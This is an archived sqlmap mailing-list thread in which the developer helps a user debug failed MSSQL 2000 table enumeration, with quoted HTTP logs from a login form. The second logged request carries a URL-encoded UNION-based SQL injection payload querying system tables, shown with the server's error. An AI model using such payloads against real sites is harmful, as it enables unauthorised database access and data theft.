Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi.

As there is no DBUSERNAME in the request I would say that the request is
not the problem here. Now, I am interested how Havij manages it though.

Is there a way for you to provide me privately with either: target url or
untouched traffic file together with Burp log for Havij run against that
target?

Without more info I won't be able to help you more

Kind regards,
Miroslav Stampar
On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote:

>  DBUSERNAME = database user name
>
> DATABASENAME = name of the current database
>
>
> let me know if this is not helpful or if you need the snippet of html
> (which is just the hopepage)
>
>
> HTTP request [#1]:
>
> POST /index.asp?action=auth HTTP/1.1
>
> Accept-Encoding: identity
>
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Host: site.com
>
> Accept-language: en-us,en;q=0.5
>
> Pragma: no-cache
>
> Cache-control: no-cache,no-store
>
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>
> Connection: close
>
>
> UN=admin&PW=admin&x=0&y=0
>
>
> HTTP response [#1] (200 OK):
>
> Content-length: 7091
>
> X-powered-by: ASP.NET
>
> Set-cookie: sitecom=0; path=/,
> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
>
> Age: 6
>
> Uri: http://site.com:80/index.asp?action=auth
>
> Server: Microsoft-IIS/6.0
>
> Connection: close
>
> Cache-control: private
>
> Date: Tue, 21 Feb 2012 21:15:23 GMT
>
> Content-type: text/html
>
>
>
> **
>
>
> HTML OF HOMEPAGE - if relevant will add
>
>
> **
>
>
>
> ############################################################################
>
>
> HTTP request [#2]:
>
> POST /index.asp?action=auth HTTP/1.1
>
> Accept-Encoding: identity
>
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Host: site.com
>
> Accept-language: en-us,en;q=0.5
>
> Pragma: no-cache
>
> Cache-control: no-cache,no-store
>
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>
> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
>
> Connection: close
>
>
> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2
> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN
> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2
> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0
>
>
> HTTP response [#2] (500 Internal Server Error):
>
> Content-length: 480
>
> X-powered-by: ASP.NET
>
> Set-cookie: sitecom=0; path=/
>
> Age: 2
>
> Uri: http://www.site.com:80/index.asp?action=auth
>
> Server: Microsoft-IIS/6.0
>
> Connection: close
>
> Cache-control: private, no-store
>
> Date: Tue, 21 Feb 2012 21:15:28 GMT
>
> Content-type: text/html
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
>
> <html>
>
> <head>
>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>
>
>  <font face="Arial" size=2>
>
> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
> size=2>error '80004005'</font>
>
> <p>
>
> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in
> database 'DATABASENAME'.</font>
>
> <p>
>
> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>,
> line 16</font>
>
>
>
> ############################################################################
>
>
>